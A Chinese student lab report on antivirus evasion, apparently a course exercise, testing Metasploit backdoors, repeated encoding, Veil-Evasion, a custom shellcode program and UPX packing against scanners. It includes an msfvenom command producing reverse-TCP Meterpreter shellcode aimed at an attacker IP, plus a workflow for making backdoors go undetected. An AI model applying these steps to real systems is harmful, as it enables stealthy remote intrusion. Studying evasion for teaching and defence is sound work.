Exp3 免杀原理与实践
使用msf生成后门程序的检测
将上周msf生成的后门文件放在virscan.org中进行扫描
- 结果很危险
使用msf编码一次进行扫描
使用msf编码10次进行扫描
结果同样很危险,所以单纯改变编码次数并不能免杀。
使用veil-evasion生成
下载安装完成veil-evasion
设置生成免杀文件
生成成功
- 开启监听
回连成功
av测试警告,只剩5个了很不错
使用shellcode编写程序
- 这个步骤我做了好多次,因为虚拟机ip总在变化,变化一次就要重新生成一次shellcode数组,所以以下截图中ip不同常在。
首先执行命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=443 -f c 生成shellcode数组。
根据这个shellcode数组写出c程序,然后编译c程序生成可在64位windows执行的程序。
将这个可执行的程序拷到windows中。然后在win中运行,kali中监听。但是不好使。
只能在win中下载vs,然后用vs编译生成那个shellcode程序。
生成好了文件,在kali下设置监听
运行文件,获得回连
av查杀警告5个,也不错
特意看了一下360,没有用hahaha
给shellcode加壳
使用upx命令加壳
将加壳程序拷到win中,然后跟之前一样,监听,运行加壳程序。回连成功。
av查杀警告7个,这壳白加了,要是想用它搞事情就不能用这个了。
但是看了一下360,还是没查出来。
由于都是用虚拟机做的,之前的win上没有安装杀毒软件,然后安装杀毒软件,重新做了次回连。
又用360扫描了一下,只有之前没做免杀的后门被扫了出来
基础问题回答
- 杀软是如何检测出恶意代码的?
基于特征码的检测、启发式恶意软件检测、基于行为的恶意软件检测;网上答案跟老师讲的差不多
- 免杀是做什么?
- 不让杀毒软件查出来。
- 免杀的基本方法有哪些?
改变特征码、改变行为;参考免杀百度百科“免杀”(跟老师讲的差不多)